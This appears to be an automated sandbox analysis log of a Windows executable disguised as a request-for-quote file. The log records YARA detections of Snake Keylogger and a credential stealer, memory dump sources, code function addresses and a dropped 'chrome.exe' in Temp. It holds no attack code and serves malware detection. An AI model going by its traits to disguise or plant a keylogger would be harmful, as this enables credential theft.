                  Source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: RFQ__637456464647.exe PID: 6312, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: RFQ__637456464647.exe PID: 6400, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: RFQ__637456464647.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: RFQ__637456464647.exe PID: 6312, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: RFQ__637456464647.exe PID: 6400, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 1296
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D0498
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D0040
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D4318
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D2398
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D4FB0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D4968
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D29E0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D08F0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D3678
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D16F8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D3028
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D1D48
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D3CC8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D0493
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D0016
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D430A
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D2388
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D4F9F
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D4959
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D29CF
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D08E0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D3668
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D16EA
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D3018
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D1D38
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D3CB9
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648DE00
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06484628
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06484ED8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648E6D8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06487EA0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06488750
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648B770
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06485788
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648EF88
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_064834C8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06486490
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06486D40
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06483D78
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_064875F0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06487A48
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_064882F8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06484A80
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648E280
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06485330
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648EB30
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06485BE0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648F3E0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648C398
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06488BA8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06480040
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06483070
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06486038
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648F838
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_064868E8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648D098
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06483920
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_064841D0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06487198
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06484621
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06484EC8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648E6C8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648B6C9
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06487E90
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06488741
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06485778
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648EF79
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06486483
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_064834B8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06483D68
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06486D37
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_064875E0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648DDF0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06484A70
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648E271
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06487A3B
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_064882E8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648EB20
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06485321
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06485BD0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648F3D0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06483063
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648C00F
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648F828
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648602F
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_0648C020
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06480033
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_064868D8
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06483910
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_064841C0
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06487188
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B761E0
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B76A10
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B67160
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B5B170
